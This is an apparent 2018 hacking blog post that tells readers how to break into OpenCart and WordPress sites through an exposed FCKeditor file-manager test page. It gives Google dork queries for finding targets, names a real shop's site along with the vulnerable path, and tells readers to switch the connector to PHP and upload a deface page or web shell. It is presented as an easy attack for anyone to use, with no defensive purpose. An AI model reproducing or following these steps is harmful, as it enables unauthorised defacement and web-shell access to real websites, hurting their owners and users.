Tuesday, April 10, 2018

HACK Wordpress Websites Open Cart CMSFile Upload vulnerability

HACK Wordpress Websites Open Cart CMSFile Upload vulnerability


This is Very Easy Technique Of Exploiting A Wordpress Website by Uploading A Deface Page Or Shell..!!!

                              





SO here is the Procedure how you Do it:


1- open Google.com and enter Dork:
inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
    or
    inurl:Powered By OpenCart


    http://www.schoolshopper.com.au/
    Youll Got a lot of websites by google, select anyone .
    you must have to search a lot to find good fresh vulnerable websites.:P
     For Example i got this one 
    Then ill will simply add the vuln URL after the website 

    http://www.schoolshopper.com.au/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
    Example


    (The path May be chnaged in other Website , Examplesite.com/abc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)

    Now a Page will be open Like This 


    Now See The connector option which is on top left side on page, Change The Connector into PHP (see the Image below)















    and Now see file upload option and upload your deface or shell
    http://www.schoolshopper.com.au/Cyb3r_dev(1).htm

    and for checking shell or deface check this url 
      www.site.com/deface.html
      or
      www.site.com/shell.php




    go to link download
    download
    Posted by at

    No comments:

    Post a Comment

    Note: Only a member of this blog may post a comment.

    Subscribe to: Post Comments (Atom)